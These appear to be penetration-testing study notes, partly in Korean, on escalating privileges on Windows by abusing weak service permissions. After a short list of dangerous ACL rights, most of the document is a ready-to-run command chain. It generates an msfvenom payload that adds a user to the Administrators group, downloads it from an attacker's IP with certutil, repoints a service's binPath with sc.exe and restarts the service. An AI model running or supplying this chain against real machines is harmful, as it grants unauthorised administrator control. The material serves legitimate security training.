# Insecure Service Permissions ```powershell .\accesschk.exe /accepteula -uwcqv <user> <service> ``` Each service has an ACL which defines certain service-specific permissions. - Some permissions are innocuous - `SERVICE_QUERY_CONFIG` - `SERVICE_QUERY_STATUS` - Some may be useful - `SERVICE_STOP` - `SERVICE_START` - Some are dangerous - `SERVICE_CHANGE_CONFIG` - `SERVICE_ALL_ACCESS` # RABBIT HOLE - If you can change a service configuration but cannot `stop/start` the service, you may not be able to escalate privileges. ```powershell # 유저가 특정 서비스에 어떤 권한이 있는지 확인 accesschk.exe -accepteula -ucqv <USER> <SERVICE> SERVICE_ALL_ACCESS # 서비스에 대한 모든 권한 # 페이로드 생성 in local Kali msfvenom -p windows/x64/exec CMD="net localgroup administrators <user> /add" -f exe-service -o evilsvc.exe # 서비스 파일 Transfer certutil.exe -urlcache -split -f http://<IP>/evilsvc.exe evilsvc.exe # 서비스 binPath 변경 sc.exe config <SERVICE> binpath="C:\\Users\\<USER>\\Desktop\\evilsvc.exe" # 서비스 재시작 후 페이로드 실행 확인 Restart-Service <SERVICE> net localgroup Administrators ```